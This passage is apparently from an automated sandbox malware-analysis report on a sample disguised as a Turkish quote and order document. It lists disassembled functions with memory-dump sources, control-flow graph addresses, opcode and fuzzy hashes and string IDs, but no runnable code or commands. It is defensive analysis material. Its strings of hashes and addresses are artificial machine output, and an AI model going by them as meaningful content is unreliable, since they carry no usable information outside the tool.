                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (oq$4'q
                                                                                                      • API String ID: 0-1336004174
                                                                                                      • Opcode ID: da988e6ea56fbefbc3a4d37c4e29d1137a4c240b3da974508c0bdc8f00085f0c
                                                                                                      • Instruction ID: ac8c5969b51814589cda90d2e53350b5ef830f3e4144293ba6a513cda95c2cf8
                                                                                                      • Opcode Fuzzy Hash: da988e6ea56fbefbc3a4d37c4e29d1137a4c240b3da974508c0bdc8f00085f0c
                                                                                                      • Instruction Fuzzy Hash: D8828E75A01209CFCB15CFA8C584AAEBBF2FF88324F158559E845DB2A6DB31ED41CB50
                                                                                                      Function 02A169A0 Relevance: 3.0, Strings: 2, Instructions: 513COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (oq$Hq
                                                                                                      • API String ID: 0-2917151738
                                                                                                      • Opcode ID: 649d2e121a8c8c2430335ccc548d651d485e9847715ac7ca5115ef23d71f8f95
                                                                                                      • Instruction ID: c3e014af9f0bc1cb3d8442725fa124d41815fab01221f428f9a1ca882b5d043e
                                                                                                      • Opcode Fuzzy Hash: 649d2e121a8c8c2430335ccc548d651d485e9847715ac7ca5115ef23d71f8f95
                                                                                                      • Instruction Fuzzy Hash: DF127C70A002198FDB14DF69C894BAEBBF6BF88714F14852AE805DB395DF349D42CB90
                                                                                                      Function 02A13E09 Relevance: 2.9, Strings: 2, Instructions: 420COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2236 2a13e09-2a13e25 2237 2a13e27-2a13e29 2236->2237 2238 2a13e2e-2a13e3e 2236->2238 2239 2a140cc-2a140d3 2237->2239 2240 2a13e40 2238->2240 2241 2a13e45-2a13e55 2238->2241 2240->2239 2243 2a140b3-2a140c1 2241->2243 2244 2a13e5b-2a13e69 2241->2244 2247 2a140d4-2a141ba 2243->2247 2249 2a140c3-2a140c7 call 2a102c8 2243->2249 2244->2247 2248 2a13e6f 2244->2248 2318 2a141c1-2a142c9 call 2a12358 call 2a12368 call 2a12378 call 2a12388 call 2a102e4 2247->2318 2319 2a141bc 2247->2319 2248->2247 2250 2a13f00-2a13f21 2248->2250 2251 2a14084-2a140a5 call 2a128f0 2248->2251 2252 2a14067-2a14082 call 2a102d8 2248->2252 2253 2a140a7-2a140b1 2248->2253 2254 2a13f26-2a13f47 2248->2254 2255 2a13e8d-2a13eae 2248->2255 2256 2a13f4c-2a13f6d 2248->2256 2257 2a13fcc-2a14009 2248->2257 2258 2a1400e-2a14034 2248->2258 2259 2a13eb3-2a13ed5 2248->2259 2260 2a13f72-2a13f9a 2248->2260 2261 2a13e76-2a13e88 2248->2261 2262 2a14039-2a14065 2248->2262 2263 2a13eda-2a13efb 2248->2263 2264 2a13f9f-2a13fc7 2248->2264 2249->2239 2250->2239 2251->2239 2252->2239 2253->2239 2254->2239 2255->2239 2256->2239 2257->2239 2258->2239 2259->2239 2260->2239 2261->2239 2262->2239 2263->2239 2264->2239 2337 2a142cf-2a1435f 2318->2337 2319->2318
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Xq$$q
                                                                                                      • API String ID: 0-855381642
                                                                                                      • Opcode ID: 0142ae756bf3a31ec4c2dd2b557602865feed95e22b916df377bb9e2d2fae38e
                                                                                                      • Instruction ID: 81375c41d07576e97d29bc956f7956dc430081cde74d54c5a0e2a00ae508418d
                                                                                                      • Opcode Fuzzy Hash: 0142ae756bf3a31ec4c2dd2b557602865feed95e22b916df377bb9e2d2fae38e
                                                                                                      • Instruction Fuzzy Hash: 3FF15A74E04318CFDB08EFB9D8946AEBBB6BF89310B148569E406EB355CF359802CB55
                                                                                                      Function 02A1C146 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2533 2a1c146 2534 2a1c14a-2a1c14d 2533->2534 2535 2a1c14e-2a1c158 2534->2535 2536 2a1c184 2535->2536 2537 2a1c15a-2a1c172 2535->2537 2538 2a1c186-2a1c18a 2536->2538 2541 2a1c174-2a1c179 2537->2541 2542 2a1c17b-2a1c17e 2537->2542 2541->2538 2543 2a1c180-2a1c182 2542->2543 2544 2a1c18b-2a1c199 2542->2544 2543->2536 2543->2537 2544->2533 2546 2a1c19b-2a1c19d 2544->2546 2546->2534 2547 2a1c19f-2a1c1a1 2546->2547 2547->2535 2548 2a1c1a3-2a1c1c8 2547->2548 2549 2a1c1ca 2548->2549 2550 2a1c1cf-2a1c217 2548->2550 2549->2550 2552 2a1c21f-2a1c22e call 2a141a0 2550->2552 2554 2a1c233-2a1c2ac call 2a13cc0 2552->2554 2560 2a1c2b3-2a1c2d4 call 2a15658 2554->2560 2561 2a1c2ae 2554->2561 2563 2a1c2d9-2a1c2e4 2560->2563 2561->2560 2564 2a1c2e6 2563->2564 2565 2a1c2eb-2a1c2ef 2563->2565 2564->2565 2566 2a1c2f1-2a1c2f2 2565->2566 2567 2a1c2f4-2a1c2fb 2565->2567 2568 2a1c313-2a1c357 2566->2568 2569 2a1c302-2a1c310 2567->2569 2570 2a1c2fd 2567->2570 2574 2a1c3bd-2a1c3d4 2568->2574 2569->2568 2570->2569 2576 2a1c3d6-2a1c3fb 2574->2576 2577 2a1c359-2a1c36f 2574->2577 2584 2a1c413 2576->2584 2585 2a1c3fd-2a1c412 2576->2585 2581 2a1c371-2a1c37d 2577->2581 2582 2a1c399 2577->2582 2586 2a1c387-2a1c38d 2581->2586 2587 2a1c37f-2a1c385 2581->2587 2583 2a1c39f-2a1c3bc 2582->2583 2583->2574 2585->2584 2588 2a1c397 2586->2588 2587->2588 2588->2583
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: 347dc0a8c26bb24b4d33363e235373182e7a9900a8b2be26241aca065389bcfb
                                                                                                      • Instruction ID: 5adc99394743d255566d24cf2316242e0785a1d315cea419036600d35eb530d1
                                                                                                      • Opcode Fuzzy Hash: 347dc0a8c26bb24b4d33363e235373182e7a9900a8b2be26241aca065389bcfb
                                                                                                      • Instruction Fuzzy Hash: 8CA1D675E40218CFDB14DFA9D984A9DFBF2BF89320F14806AE409AB361DB309945CF51
                                                                                                      Function 02A15362 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2652 2a15362-2a15364 2653 2a153c4-2a15484 call 2a141a0 call 2a13cc0 2652->2653 2654 2a15366-2a153a0 2652->2654 2666 2a15486 2653->2666 2667 2a1548b-2a154a9 2653->2667 2655 2a153a2 2654->2655 2656 2a153a7-2a153c2 2654->2656 2655->2656 2656->2653 2666->2667 2697 2a154ac call 2a15649 2667->2697 2698 2a154ac call 2a15658 2667->2698 2668 2a154b2-2a154bd 2669 2a154c4-2a154c8 2668->2669 2670 2a154bf 2668->2670 2671 2a154ca-2a154cb 2669->2671 2672 2a154cd-2a154d4 2669->2672 2670->2669 2673 2a154ec-2a15530 2671->2673 2674 2a154d6 2672->2674 2675 2a154db-2a154e9 2672->2675 2679 2a15596-2a155ad 2673->2679 2674->2675 2675->2673 2681 2a15532-2a15548 2679->2681 2682 2a155af-2a155d4 2679->2682 2686 2a15572 2681->2686 2687 2a1554a-2a15556 2681->2687 2689 2a155d6-2a155eb 2682->2689 2690 2a155ec 2682->2690 2688 2a15578-2a15595 2686->2688 2691 2a15560-2a15566 2687->2691 2692 2a15558-2a1555e 2687->2692 2688->2679 2689->2690 2693 2a15570 2691->2693 2692->2693 2693->2688 2697->2668 2698->2668
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: 0e93882a3bcb488a934a23dc3defe00eae023d7b51e59bce9f4eb90a5961b2e2
                                                                                                      • Instruction ID: 3e7d2fc73cd171f93525de166843676b1f14969c0e30ec905ddc904ea244e997
                                                                                                      • Opcode Fuzzy Hash: 0e93882a3bcb488a934a23dc3defe00eae023d7b51e59bce9f4eb90a5961b2e2
                                                                                                      • Instruction Fuzzy Hash: 7491C374E00218CFEB14DFAAD984B9DBBF2BF89310F548069E809AB365DB309941DF50
                                                                                                      Function 02A1C46B Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2699 2a1c46b-2a1c498 2700 2a1c49a 2699->2700 2701 2a1c49f-2a1c57c call 2a141a0 call 2a13cc0 2699->2701 2700->2701 2711 2a1c583-2a1c5a4 call 2a15658 2701->2711 2712 2a1c57e 2701->2712 2714 2a1c5a9-2a1c5b4 2711->2714 2712->2711 2715 2a1c5b6 2714->2715 2716 2a1c5bb-2a1c5bf 2714->2716 2715->2716 2717 2a1c5c1-2a1c5c2 2716->2717 2718 2a1c5c4-2a1c5cb 2716->2718 2719 2a1c5e3-2a1c627 2717->2719 2720 2a1c5d2-2a1c5e0 2718->2720 2721 2a1c5cd 2718->2721 2725 2a1c68d-2a1c6a4 2719->2725 2720->2719 2721->2720 2727 2a1c6a6-2a1c6cb 2725->2727 2728 2a1c629-2a1c63f 2725->2728 2734 2a1c6e3 2727->2734 2735 2a1c6cd-2a1c6e2 2727->2735 2732 2a1c641-2a1c64d 2728->2732 2733 2a1c669 2728->2733 2736 2a1c657-2a1c65d 2732->2736 2737 2a1c64f-2a1c655 2732->2737 2738 2a1c66f-2a1c68c 2733->2738 2735->2734 2739 2a1c667 2736->2739 2737->2739 2738->2725 2739->2738
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: 1a8c8715fc6206e8cbbe1b4f458c8b5e96ce4c84c47e84b5dee11bb82ab3af2f
                                                                                                      • Instruction ID: eb139609db0cf77dd151ebe784cf5ab55b188d10b5c1837f21cc83765436769f
                                                                                                      • Opcode Fuzzy Hash: 1a8c8715fc6206e8cbbe1b4f458c8b5e96ce4c84c47e84b5dee11bb82ab3af2f
                                                                                                      • Instruction Fuzzy Hash: 2381B474E402188FDB14DFAAD984B9DBBF2BF89320F14906AE419AB365DB309941CF51
                                                                                                      Function 02A1D278 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2787 2a1d278-2a1d2a8 2788 2a1d2aa 2787->2788 2789 2a1d2af-2a1d38c call 2a141a0 call 2a13cc0 2787->2789 2788->2789 2799 2a1d393-2a1d3b4 call 2a15658 2789->2799 2800 2a1d38e 2789->2800 2802 2a1d3b9-2a1d3c4 2799->2802 2800->2799 2803 2a1d3c6 2802->2803 2804 2a1d3cb-2a1d3cf 2802->2804 2803->2804 2805 2a1d3d1-2a1d3d2 2804->2805 2806 2a1d3d4-2a1d3db 2804->2806 2807 2a1d3f3-2a1d437 2805->2807 2808 2a1d3e2-2a1d3f0 2806->2808 2809 2a1d3dd 2806->2809 2813 2a1d49d-2a1d4b4 2807->2813 2808->2807 2809->2808 2815 2a1d4b6-2a1d4db 2813->2815 2816 2a1d439-2a1d44f 2813->2816 2822 2a1d4f3 2815->2822 2823 2a1d4dd-2a1d4f2 2815->2823 2820 2a1d451-2a1d45d 2816->2820 2821 2a1d479 2816->2821 2824 2a1d467-2a1d46d 2820->2824 2825 2a1d45f-2a1d465 2820->2825 2826 2a1d47f-2a1d49c 2821->2826 2823->2822 2827 2a1d477 2824->2827 2825->2827 2826->2813 2827->2826
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: c0af1f81160c90cf060aa75828b1bcb76f5debfeef88aaf8d3145018eae1296d
                                                                                                      • Instruction ID: 21413c29820d052ecfb1770382cf85e9a826c1c592b017fe4e58fc0597e51820
                                                                                                      • Opcode Fuzzy Hash: c0af1f81160c90cf060aa75828b1bcb76f5debfeef88aaf8d3145018eae1296d
                                                                                                      • Instruction Fuzzy Hash: 7C81B374E00618CFEB18DFAAD984B9DBBF2BF89310F148069E409AB365DB309941DF50
                                                                                                      Function 02A1CCD8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2743 2a1ccd8-2a1cd08 2744 2a1cd0a 2743->2744 2745 2a1cd0f-2a1cdec call 2a141a0 call 2a13cc0 2743->2745 2744->2745 2755 2a1cdf3-2a1ce14 call 2a15658 2745->2755 2756 2a1cdee 2745->2756 2758 2a1ce19-2a1ce24 2755->2758 2756->2755 2759 2a1ce26 2758->2759 2760 2a1ce2b-2a1ce2f 2758->2760 2759->2760 2761 2a1ce31-2a1ce32 2760->2761 2762 2a1ce34-2a1ce3b 2760->2762 2763 2a1ce53-2a1ce97 2761->2763 2764 2a1ce42-2a1ce50 2762->2764 2765 2a1ce3d 2762->2765 2769 2a1cefd-2a1cf14 2763->2769 2764->2763 2765->2764 2771 2a1cf16-2a1cf3b 2769->2771 2772 2a1ce99-2a1ceaf 2769->2772 2778 2a1cf53 2771->2778 2779 2a1cf3d-2a1cf52 2771->2779 2776 2a1ceb1-2a1cebd 2772->2776 2777 2a1ced9 2772->2777 2780 2a1cec7-2a1cecd 2776->2780 2781 2a1cebf-2a1cec5 2776->2781 2782 2a1cedf-2a1cefc 2777->2782 2779->2778 2783 2a1ced7 2780->2783 2781->2783 2782->2769 2783->2782
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: 30603019e43b3fb4851bc789f8cd2908e67515bc9df6fc51400f12205ce849d1
                                                                                                      • Instruction ID: de01d04b4cef48f1d7935eba082eb9cde1cf3a8ecb545ea665a7ea56a7f9738e
                                                                                                      • Opcode Fuzzy Hash: 30603019e43b3fb4851bc789f8cd2908e67515bc9df6fc51400f12205ce849d1
                                                                                                      • Instruction Fuzzy Hash: 4A81C274E402188FEB14DFAAD984B9DBBF2BF89310F14C06AE419AB365DB309941CF51
                                                                                                      Function 02A1CA08 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: 20cf1f6ea4c2a91bcbcc1048c1896e3a588d931f8742c38a6b5b3eaff545cb28
                                                                                                      • Instruction ID: a3553c4a20d45e3e60e34b7ee0defc294870ce4be9044f4ef84444a0e4296ac2
                                                                                                      • Opcode Fuzzy Hash: 20cf1f6ea4c2a91bcbcc1048c1896e3a588d931f8742c38a6b5b3eaff545cb28
                                                                                                      • Instruction Fuzzy Hash: E381B374E002188FEB14DFAAD984B9DBBF2BF89310F14C06AE819AB365DB305941DF51
                                                                                                      Function 02A1CFAB Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: 4255942b3d3faada4088d6e381bc1c5e4b88fc924f031086a651a2ce5fd05a18
                                                                                                      • Instruction ID: 443249c80fab8f5499ec25788427eda1ed5d9a4893a97cffe982eca90a4fec2c
                                                                                                      • Opcode Fuzzy Hash: 4255942b3d3faada4088d6e381bc1c5e4b88fc924f031086a651a2ce5fd05a18
                                                                                                      • Instruction Fuzzy Hash: 9381C274E00618CFEB14DFAAD984B9DBBF2BF89310F148069E819AB365DB309945DF50
                                                                                                      Function 02A1C738 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: bd13d200f3c38c6d8f35c35041aab4e4fed1fba7a60f0cc8362f75ff3de61765
                                                                                                      • Instruction ID: 9b85ec5f19e7be6f10c65e2ff389c112ba567b0f5150dc105e7315c2c6702531
                                                                                                      • Opcode Fuzzy Hash: bd13d200f3c38c6d8f35c35041aab4e4fed1fba7a60f0cc8362f75ff3de61765
                                                                                                      • Instruction Fuzzy Hash: 5F819174E00218CFEB14DFAAD984B9DBBF2BF88310F14806AE459AB365DB309941DF51
                                                                                                      Function 057781D0 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: PHq$PHq
                                                                                                      • API String ID: 0-1274609152
                                                                                                      • Opcode ID: 01101e76ec771a50f48c1085164cffdd7958903376e188c57ca5a2ee17814b90
                                                                                                      • Instruction ID: 8f650b6c082ec1e55131c047bb01cfe3f22a9bf35554554fb4aff579743f741b
                                                                                                      • Opcode Fuzzy Hash: 01101e76ec771a50f48c1085164cffdd7958903376e188c57ca5a2ee17814b90
                                                                                                      • Instruction Fuzzy Hash: D281EE70E0021C8FDB58CFAAD998BADBBF2BF89300F24806AD419AB354DB305945DF11
                                                                                                      Function 051B9548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2d0ea659a18c18e11758d4a1111a8124a2492bc883bb9d8656a7ee3fceced5a9
                                                                                                      • Instruction ID: 74dc67074e8bffd4b6b26ee0c69f4fbfdddf6b0c390d5282c998aecfd850f721
                                                                                                      • Opcode Fuzzy Hash: 2d0ea659a18c18e11758d4a1111a8124a2492bc883bb9d8656a7ee3fceced5a9
                                                                                                      • Instruction Fuzzy Hash: 11F1E674D00218CFEB14DFA9C984B9DBBB2BF88304F54C1A9E948AB355DB749986CF50
                                                                                                      Function 051B0B30 Relevance: .7, Instructions: 709COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d977ae9542cea40faabe8cdfb4deb4f444dd4a87e77730f468906150aa78c51f
                                                                                                      • Instruction ID: 8615ab7aeac24facede62a8e576ece10f706e0f1db1c95e76b1845339763390a
                                                                                                      • Opcode Fuzzy Hash: d977ae9542cea40faabe8cdfb4deb4f444dd4a87e77730f468906150aa78c51f
                                                                                                      • Instruction Fuzzy Hash: 1A72C074E042288FEB64DF69C994BEDBBB2BB49300F1481E9D809A7355DB749E81CF40
                                                                                                      Function 05777B78 Relevance: .3, Instructions: 296COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 839fa6751654a03a17ee69b1fc6c5096b107cb95a8d142216ed779ba8289982e
                                                                                                      • Instruction ID: ae788c2d4b8204a62e8fe5278685606b44f4140c80e82617366ef5d03bae34fd
                                                                                                      • Opcode Fuzzy Hash: 839fa6751654a03a17ee69b1fc6c5096b107cb95a8d142216ed779ba8289982e
                                                                                                      • Instruction Fuzzy Hash: 86E1C074E00218CFEB64DFA5D984B9DBBB2BF89304F2081A9D809A7395DB355E85CF50
                                                                                                      Function 0577B318 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 926f59d3701996819491e09b36eb4610ca12088d3c204e2808c25403bda94611
                                                                                                      • Instruction ID: 3d583c68c794b858ae792b751aad92884549913940b4a8c90a4187e29459d56f
                                                                                                      • Opcode Fuzzy Hash: 926f59d3701996819491e09b36eb4610ca12088d3c204e2808c25403bda94611
                                                                                                      • Instruction Fuzzy Hash: 80D19C78E002188FEB54DFA9D984B9DBBB2FF89300F2080A9D809AB355DB355D81DF51
                                                                                                      Function 05778FB0 Relevance: .3, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 11b4953b76148a92b3b6950a2376443ef0421cba2c1ea469549bd3a62f778e4c
                                                                                                      • Instruction ID: 2bfb000cccad3817191ccd54995af6480e9353a6a3a8af965417564b0b8c3bec
                                                                                                      • Opcode Fuzzy Hash: 11b4953b76148a92b3b6950a2376443ef0421cba2c1ea469549bd3a62f778e4c
                                                                                                      • Instruction Fuzzy Hash: 6BD18C78E002188FDB54DFA9D994B9DBBB2FF89300F2080A9D909AB355DB355D81CF51
                                                                                                      Function 051B2968 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1eccd2ed22a3ae0de7ab59abacff89265263c7084f9aefb07ebb23bcb1590e84
                                                                                                      • Instruction ID: ed012464f25830037f8336c4f009b683882960d9ae0d68341d3c7c196089232b
                                                                                                      • Opcode Fuzzy Hash: 1eccd2ed22a3ae0de7ab59abacff89265263c7084f9aefb07ebb23bcb1590e84
                                                                                                      • Instruction Fuzzy Hash: 19C19078E00218CFDB54DFA5D984B9DBBB2BF89300F2081A9E819AB354DB355E85CF50
                                                                                                      Function 051BDE00 Relevance: .3, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
